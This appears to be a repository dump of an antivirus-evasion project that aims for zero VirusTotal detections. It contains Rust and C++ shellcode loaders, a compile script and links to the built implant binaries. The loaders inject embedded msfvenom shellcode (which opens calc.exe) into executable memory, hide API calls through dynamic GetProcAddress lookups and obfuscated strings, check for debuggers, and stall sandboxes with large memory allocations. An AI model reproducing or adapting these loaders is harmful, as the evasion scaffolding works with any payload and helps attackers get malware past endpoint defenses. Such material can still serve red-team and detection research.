├── Readme.md
├── calc
    ├── calc.bin
    ├── calc_binja_nops.bin
    ├── calc_custom.bin
    └── calc_zero.png
├── rusty-calc
    ├── Cargo.toml
    ├── Readme.md
    ├── main-original.rs
    ├── main.rs
    └── rusty-calc-results.png
└── self-injecting-calc
    ├── beautify.py
    ├── calc_custom.bin
    ├── compile.bat
    ├── implant.cpp
    ├── implant.exe
    ├── implant.exe.bak
    ├── implant.obj
    ├── implant_dynamic.exe
    ├── implant_noepi.exe
    ├── implant_static.exe
    └── self-injecting-calc-zero.png


/Readme.md:
--------------------------------------------------------------------------------
1 | An ongoing project that aims to achieve 0-total detections on the VirusTotal platform for various types of malicious code.
2 | 


--------------------------------------------------------------------------------
/calc/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/calc/calc.bin


--------------------------------------------------------------------------------
/calc/calc_binja_nops.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/calc/calc_binja_nops.bin


--------------------------------------------------------------------------------
/calc/calc_custom.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/calc/calc_custom.bin


--------------------------------------------------------------------------------
/calc/calc_zero.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/calc/calc_zero.png


--------------------------------------------------------------------------------
/rusty-calc/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "rusty_calc"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | 
 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 7 | 
 8 | [profile.release]
 9 | opt-level = 0
10 | 
11 | 
12 | 
13 | [dependencies]
14 | errno = "0.2.8"
15 | libc = "0.2.139"
16 | windows-sys = {version = "0.42.0", features=["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", 
17 | "Win32_Security", "Win32_System_Diagnostics_Debug","Win32_System_LibraryLoader"]}
18 | 


--------------------------------------------------------------------------------
/rusty-calc/Readme.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/rusty-calc/main-original.rs:
--------------------------------------------------------------------------------
 1 | // Self-Injecting Rust Implant, using windows_sys crate
 2 | // by 0xTriboulet
 3 | 
 4 | use std::process;
 5 | use std::ffi::c_void;
 6 | 
 7 | use windows_sys::Win32::Foundation::HANDLE;
 8 | use windows_sys::Win32::Foundation::GetLastError;
 9 | use windows_sys::Win32::Security::SECURITY_ATTRIBUTES;
10 | use windows_sys::Win32::System::LibraryLoader::{GetModuleHandleA,GetProcAddress};
11 | use windows_sys::Win32::System::Threading::{CreateThread,WaitForSingleObject,LPTHREAD_START_ROUTINE,THREAD_CREATION_FLAGS};
12 | use windows_sys::Win32::System::Memory::{VirtualAlloc,VirtualProtectMEM_COMMIT,MEM_RESERVE, PAGE_READWRITE, PAGE_EXECUTE_READ, PAGE_PROTECTION_FLAGS};
13 | 
14 | use std::ptr;
15 | 
16 | type DWORD = u32;
17 | 
18 | #[allow(non_snake_case)]
19 | fn main(){
20 |     //msfvenom -p windows/x64/exec CMD="calc.exe"
21 |     let payload : [u8;276] = [0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x0, 0x0, 0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0xf, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x1, 0xd0, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x1, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x41, 0x8b, 0xc, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x48, 0x8d, 0x8d, 0x1, 0x1, 0x0, 0x0, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x6, 0x7c, 0xa, 0x80, 0xfb, 0xe0, 0x75, 0x5, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x0, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x0 ];
22 | 
23 |     let buffer;
24 |     let buffer_size = 1000000000;
25 | 
26 |     unsafe {
27 |       buffer = libc::malloc(buffer_size);
28 |       libc::memset(buffer, 69, buffer_size);
29 |     };
30 | 
31 |     if  true {
32 |     // allocate memory
33 |       unsafe{
34 | 
35 |         let base_addr: *mut c_void= VirtualAlloc(
36 |             ptr::null_mut(),
37 |             payload.len().try_into().unwrap(),
38 |             MEM_COMMIT | MEM_RESERVE,
39 |             PAGE_READWRITE
40 |         );
41 |     
42 |         if base_addr.is_null() { 
43 |             println!("[-] Couldn't allocate memory to current proc.")
44 |         }
45 |     
46 |         // copy memory
47 |         std::ptr::copy(payload.as_ptr() as  _, base_addr, payload.len());
48 | 
49 |         let mut old_protect: DWORD = PAGE_READWRITE;
50 |         let virtual_protect = VirtualProtect (
51 |             base_addr,
52 |             payload.len() as usize,
53 |             PAGE_EXECUTE_READ,
54 |             &mut old_protect
55 |         );
56 | 
57 |         if virtual_protect.is_null() {
58 |             let error = GetLastError();
59 |             println!("[-] Error: {}", error.to_string());
60 |             process::exit(0x01);
61 |         }
62 | 
63 |         let mut tid = 0;
64 |         let ep: extern "system" fn(*mut c_void) -> u32 = { std::mem::transmute(base_addr) };
65 | 
66 |         let h_thread = CreateThread(
67 |             ptr::null_mut(),
68 |             0,
69 |             Some(ep),
70 |             ptr::null_mut(),
71 |             0,
72 |             &mut tid
73 |         );
74 | 
75 |         if h_thread == 0 {
76 |             let error = GetLastError();
77 |             println!("{}", error.to_string())
78 |         
79 |         }
80 |         
81 |         let status = WaitForSingleObject(h_thread, u32::MAX);
82 |         if status != 0 {
83 |             let error = GetLastError();
84 |             println!("{}", error.to_string())
85 |         }
86 | 
87 |         libc::free(buffer);
88 |       }
89 | 
90 |     }
91 | 
92 | }
93 | 


--------------------------------------------------------------------------------
/rusty-calc/main.rs:
--------------------------------------------------------------------------------
  1 | // Self-Injecting Rust Implant, using windows_sys crate
  2 | // by 0xTriboulet
  3 | 
  4 | use std::process;
  5 | use std::ffi::c_void;
  6 | 
  7 | use windows_sys::Win32::Foundation::HANDLE;
  8 | use windows_sys::Win32::Foundation::GetLastError;
  9 | use windows_sys::Win32::Security::SECURITY_ATTRIBUTES;
 10 | //use windows_sys::Win32::System::Diagnostics::Debug::IsDebuggerPresent;
 11 | use windows_sys::Win32::System::LibraryLoader::{GetModuleHandleA,GetProcAddress};
 12 | use windows_sys::Win32::System::Threading::{WaitForSingleObject,LPTHREAD_START_ROUTINE,THREAD_CREATION_FLAGS};
 13 | use windows_sys::Win32::System::Memory::{MEM_COMMIT,MEM_RESERVE, PAGE_READWRITE, PAGE_EXECUTE_READ, PAGE_PROTECTION_FLAGS};
 14 | //https://www.virustotal.com/gui/file/f1916f1ab6d3f1f338b9d888a40a26993650a34f9eef5f77df57993fc02fbe8a?nocache=1
 15 | //https://www.virustotal.com/gui/file/0897aef14126dbe00ba4cf78988e265ee2ac7d23ce8952b66fdadca7b36039c6?nocache=1
 16 | use std::ptr;
 17 | 
 18 | type DWORD = u32;
 19 | 
 20 | #[allow(non_snake_case)]
 21 | fn main(){
 22 |     
 23 |     //custom calc payload
 24 |     //let payload: [u8;289] = [0x90, 0x48, 0xff, 0xc0, 0x48, 0xff, 0xc8, 0x90, 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x0, 0x0, 0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x31, 0xd2, 0x90, 0x51, 0x56, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0xf, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x31, 0xc0, 0x90, 0xac, 0x3c, 0x61, 0x7c, 0x2, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x1, 0xd0, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x83, 0xf8, 0x0, 0x74, 0x67, 0x48, 0x1, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x56, 0xff, 0xc9, 0x90, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x41, 0x8b, 0xc, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x59, 0x41, 0x59, 0x5e, 0x59, 0x5a, 0x41, 0x59, 0x41, 0x59, 0x41, 0x59, 0x48, 0x83, 0xec, 0x20, 0x41, 0x51, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0xba, 0x1, 0x0, 0x0, 0x0, 0x48, 0x8d, 0x8d, 0x6, 0x1, 0x0, 0x0, 0x41, 0xba, 0x30, 0x8b, 0x6f, 0x87, 0x41, 0xff, 0xc2, 0xff, 0xd5, 0xbb, 0xef, 0xb5, 0xa2, 0x56, 0xff, 0xc3, 0x41, 0xba, 0xa5, 0x95, 0xbd, 0x9d, 0x41, 0xff, 0xc2, 0x90, 0x90, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x6, 0x7c, 0xa, 0x80, 0xfb, 0xe0, 0x75, 0x5, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x0, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x0 ];
 25 | 
 26 |     let buffer;
 27 |     let buffer_size = 1000000000;
 28 | 
 29 |     unsafe {
 30 |       buffer = libc::malloc(buffer_size);
 31 |       libc::memset(buffer, 69, buffer_size);
 32 |     };
 33 | 
 34 |     if  true {//unsafe {IsDebuggerPresent()} == 0 && !buffer.is_null(){
 35 |         
 36 | 
 37 |         let sKernel32 =b"kernel32.dll\0";
 38 |         let sVirtualAlloc = b"VirtualAlloc\0";
 39 |         let sVirtualProtect = b"VirtualProtect\0";
 40 |         let sCreateThread = b"CreateThread\0";
 41 | 
 42 |     // allocate memory
 43 |       unsafe{
 44 |         //msfvenom -p windows/x64/exec CMD="calc.exe"
 45 |         let payload : [u8;276] = [0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x0, 0x0, 0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0xf, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x1, 0xd0, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x1, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x41, 0x8b, 0xc, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x48, 0x8d, 0x8d, 0x1, 0x1, 0x0, 0x0, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x6, 0x7c, 0xa, 0x80, 0xfb, 0xe0, 0x75, 0x5, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x0, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x0 ];
 46 | 
 47 |         //rust WinAPI pointer
 48 |         type VirtualAllocFn = unsafe extern "system" fn(*const c_void, usize, u32, u32) -> *mut c_void;
 49 |         let _pVirtualAlloc = GetProcAddress(GetModuleHandleA(sKernel32.as_ptr()), sVirtualAlloc.as_ptr()).unwrap();
 50 |         let pVirtualAlloc: VirtualAllocFn = std::mem::transmute(_pVirtualAlloc);
 51 |         let base_addr: *mut c_void= pVirtualAlloc(
 52 |             ptr::null_mut(),
 53 |             payload.len().try_into().unwrap(),
 54 |             MEM_COMMIT | MEM_RESERVE,
 55 |             PAGE_READWRITE
 56 |         );
 57 |     
 58 |         if base_addr.is_null() { 
 59 |             println!("[-] Couldn't allocate memory to current proc.")
 60 |         }
 61 |     
 62 |         // copy memory
 63 |         std::ptr::copy(payload.as_ptr() as  _, base_addr, payload.len());
 64 | 
 65 |         let mut old_protect: DWORD = PAGE_READWRITE;
 66 | 
 67 | 
 68 |         type VirtualProtectFn = unsafe extern "system" fn(*const c_void, usize, PAGE_PROTECTION_FLAGS, *mut PAGE_PROTECTION_FLAGS) -> *mut c_void;
 69 |         let _pVirtualProtect = GetProcAddress(GetModuleHandleA(sKernel32.as_ptr()), sVirtualProtect.as_ptr()).unwrap();
 70 |         let pVirtualProtect: VirtualProtectFn = std::mem::transmute(_pVirtualProtect);
 71 | 
 72 | 
 73 |         //let pVirtualProtect:unsafe extern "system" fn(*const c_void, usize, PAGE_PROTECTION_FLAGS, *mut PAGE_PROTECTION_FLAGS) -> _ = {VirtualProtect};
 74 |         let virtual_protect = pVirtualProtect (
 75 |             base_addr,
 76 |             payload.len() as usize,
 77 |             PAGE_EXECUTE_READ,
 78 |             &mut old_protect
 79 |         );
 80 | 
 81 |         if virtual_protect.is_null() {
 82 |             let error = GetLastError();
 83 |             println!("[-] Error: {}", error.to_string());
 84 |             process::exit(0x01);
 85 |         }
 86 | 
 87 | 
 88 |         let mut tid = 0;
 89 |         let ep: extern "system" fn(*mut c_void) -> u32 = { std::mem::transmute(base_addr) };
 90 | 
 91 | 
 92 |         type CreateThreadFn = unsafe extern "system" fn(*const SECURITY_ATTRIBUTES, usize, LPTHREAD_START_ROUTINE, *const ::core::ffi::c_void, THREAD_CREATION_FLAGS, *mut u32) -> HANDLE;
 93 |         let _pCreateThread = GetProcAddress(GetModuleHandleA(sKernel32.as_ptr()), sCreateThread.as_ptr()).unwrap();
 94 |         let pCreateThread: CreateThreadFn = std::mem::transmute(_pCreateThread);
 95 | 
 96 |         let h_thread = pCreateThread(
 97 |             ptr::null_mut(),
 98 |             0,
 99 |             Some(ep),
100 |             ptr::null_mut(),
101 |             0,
102 |             &mut tid
103 |         );
104 | 
105 |         if h_thread == 0 {
106 |             let error = GetLastError();
107 |             println!("{}", error.to_string())
108 |         
109 |         }
110 |         
111 |         let status = WaitForSingleObject(h_thread, u32::MAX);
112 |         if status != 0 {
113 |             let error = GetLastError();
114 |             println!("{}", error.to_string())
115 |         }
116 | 
117 |         libc::free(buffer);
118 |       }
119 | 
120 |     }
121 | 
122 | }
123 | 


--------------------------------------------------------------------------------
/rusty-calc/rusty-calc-results.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/rusty-calc/rusty-calc-results.png


--------------------------------------------------------------------------------
/self-injecting-calc/beautify.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | 
 3 | try:
 4 |     plaintext = open(sys.argv[1], "rb").read()
 5 | except:
 6 |     print("File argument needed! %s <raw payload file>" % sys.argv[0])
 7 |     sys.exit()
 8 | 
 9 | 
10 | open("payload.out",'wb').write(plaintext)
11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };')


--------------------------------------------------------------------------------
/self-injecting-calc/calc_custom.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/self-injecting-calc/calc_custom.bin


--------------------------------------------------------------------------------
/self-injecting-calc/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /nologo /Ox /favor:blend /MD /W1 /GS- /std:c++20 /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64


--------------------------------------------------------------------------------
/self-injecting-calc/implant.cpp:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | #include <stdio.h>
 3 | #include <time.h>
 4 | #include <random>
 5 | 
 6 | typedef LPVOID (WINAPI * VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
 7 | typedef BOOL (WINAPI * VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);
 8 | typedef HANDLE (WINAPI * CreateThread_t)(LPSECURITY_ATTRIBUTES   lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE  lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags,LPDWORD lpThreadId);
 9 | 
10 | unsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 };
11 | unsigned char sVirtualAlloc[] = {'V','i','r','t','u','a','l','A','l','l','o','c',0x0};
12 | unsigned char sCreateThread[] = {'C','r','e','a','t','e','T','h','r','e','a','d',0x0,};
13 | 
14 | 
15 | int __cdecl main(VOID) {
16 | 	//Begin anti-debugging
17 | 	BOOL  bDebuggerPresent;
18 | 	CheckRemoteDebuggerPresent(GetCurrentProcess(), &bDebuggerPresent); //check for remote debugger, store result in bDebuggerPresent
19 | 	__analysis_noreturn int FatalExit(1); //if in a debugger, return control to debugger
20 | 	DebugActiveProcessStop(GetCurrentProcessId()); //if in a debugger, end own process
21 | 	
22 | 	//Request and interatively use a bunch of memory
23 | 	int i = 100000000;
24 | 	int n = 0;
25 | 	char * buffer;
26 | 	buffer = (char*) malloc (i+1);
27 | 	
28 | 	for (n=0; n<i; n++)
29 | 	  buffer[n]=rand()%26+'a';
30 | 	buffer[i]='\0';
31 | 	
32 | 	if (buffer==NULL) exit (1);
33 | 	free (buffer);
34 | 	
35 | 	
36 | 	if (!(IsDebuggerPresent() || bDebuggerPresent)){ //One final check before we get into the juicey stuff, check if local debugger OR remote debugger
37 | 		
38 | 		void * exec_mem;
39 | 		BOOL rv;
40 | 		HANDLE th;
41 | 		DWORD oldprotect = 0;
42 | 		
43 | 		//function pointers
44 | 		VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t) GetProcAddress(GetModuleHandle((LPCSTR) "kErnEl32.DLl"), (LPCSTR) sVirtualAlloc);
45 | 		VirtualProtect_t VirtualProtect_p = (VirtualProtect_t) GetProcAddress(GetModuleHandle((LPCSTR) "kErnEl32.DLl"), (LPCSTR) sVirtualProtect);
46 | 		CreateThread_t CreateThread_p = (CreateThread_t) GetProcAddress(GetModuleHandle((LPCSTR) "kErnEl32.DLl"), (LPCSTR) sCreateThread);
47 | 		
48 | 		//custom calc payload
49 | 		unsigned char payload[] = { 0x90, 0x48, 0xff, 0xc0, 0x48, 0xff, 0xc8, 0x90, 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x0, 0x0, 0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x31, 0xd2, 0x90, 0x51, 0x56, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0xf, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x31, 0xc0, 0x90, 0xac, 0x3c, 0x61, 0x7c, 0x2, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x1, 0xd0, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x83, 0xf8, 0x0, 0x74, 0x67, 0x48, 0x1, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x56, 0xff, 0xc9, 0x90, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x41, 0x8b, 0xc, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x59, 0x41, 0x59, 0x5e, 0x59, 0x5a, 0x41, 0x59, 0x41, 0x59, 0x41, 0x59, 0x48, 0x83, 0xec, 0x20, 0x41, 0x51, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0xba, 0x1, 0x0, 0x0, 0x0, 0x48, 0x8d, 0x8d, 0x6, 0x1, 0x0, 0x0, 0x41, 0xba, 0x30, 0x8b, 0x6f, 0x87, 0x41, 0xff, 0xc2, 0xff, 0xd5, 0xbb, 0xef, 0xb5, 0xa2, 0x56, 0xff, 0xc3, 0x41, 0xba, 0xa5, 0x95, 0xbd, 0x9d, 0x41, 0xff, 0xc2, 0x90, 0x90, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x6, 0x7c, 0xa, 0x80, 0xfb, 0xe0, 0x75, 0x5, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x0, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x0 };
50 | 		unsigned int payload_len = sizeof(payload);
51 | 		
52 | 		// Allocate a memory buffer for payload
53 | 		exec_mem = VirtualAlloc_p(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
54 | 
55 | 		// Copy payload to program memory ; this gets inlined
56 | 		RtlMoveMemory(exec_mem, payload, payload_len);
57 | 		
58 | 		// Make payload executable
59 | 		rv = VirtualProtect_p(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
60 | 
61 | 		printf("\nLaunch Payload?\n");
62 | 		getchar();
63 | 
64 | 		// Run payload
65 | 		if ( rv != 0 ) {
66 | 				th = CreateThread_p(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
67 | 				Sleep(1000);
68 | 				//Use sleep instead of WaitForSingleObject(th, INFINITE);
69 | 		}
70 | 		
71 | 	}
72 | 	
73 | 	
74 | 
75 | 	return 0;
76 | }


--------------------------------------------------------------------------------
/self-injecting-calc/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/self-injecting-calc/implant.exe


--------------------------------------------------------------------------------
/self-injecting-calc/implant.exe.bak:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/self-injecting-calc/implant.exe.bak


--------------------------------------------------------------------------------
/self-injecting-calc/implant.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/self-injecting-calc/implant.obj


--------------------------------------------------------------------------------
/self-injecting-calc/implant_dynamic.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/self-injecting-calc/implant_dynamic.exe


--------------------------------------------------------------------------------
/self-injecting-calc/implant_noepi.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/self-injecting-calc/implant_noepi.exe


--------------------------------------------------------------------------------
/self-injecting-calc/implant_static.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/self-injecting-calc/implant_static.exe


--------------------------------------------------------------------------------
/self-injecting-calc/self-injecting-calc-zero.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/ZeroTotal/d17a51be3924318cb0000a0e8db61bbfd478d4aa/self-injecting-calc/self-injecting-calc-zero.png


--------------------------------------------------------------------------------